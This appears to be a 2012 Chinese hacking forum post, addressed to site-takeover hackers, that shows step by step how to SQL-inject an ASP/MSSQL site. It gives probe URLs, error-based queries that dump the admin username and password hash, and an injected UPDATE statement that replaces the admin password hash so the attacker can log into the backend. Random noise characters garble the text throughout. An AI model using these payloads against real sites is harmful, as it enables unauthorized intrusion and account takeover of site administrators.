经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。5 f# J+ G$ p& z( b+ k/ i
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
- {/ C D4 Z$ _测试如下:
* t2 f) {1 p! c/ V) `http://www.tmdsb.com/news.asp?id=121
- i( z# A& f$ Z, }- h8 ^8 h" L& D在地址后输入单引号,显示
/ f% q2 c# |) |* ]7 ~* c, z$ }Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
4 m% T5 \ z3 R* g& z3 W# q) ]字符串 ’’’ 之前有未闭合的引号5 p7 t5 i" f2 m3 @; ]* _: g
/news/tmdws.asp,行63
/ I4 k- j, ?! O+ n' s8 ~8 b说明没有过滤单引号且数据库是MSSQL.
, I! J4 z# m, |# E3 g) |- b1 ~and 1=1正常。and 1=2出错。肯定存在注入# l, B4 B H8 [7 N0 G: \* B
接着输入
- [: V+ Y* f" J6 F6 | o! H1 p4 X7 Thttp://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
! G* k" k5 V [得到帐号为:admin
/ _9 r! B& T* phttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)! Y' i+ B6 r o! i
得到密码为:a4716077c2ba075c
5 {! l1 k* H/ S. }7 u接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
/ ?, x0 ]3 u, j命令如下 :, q$ e2 Y5 }3 `, i+ Z6 N7 \
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–' x- t# }- H/ k# v
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41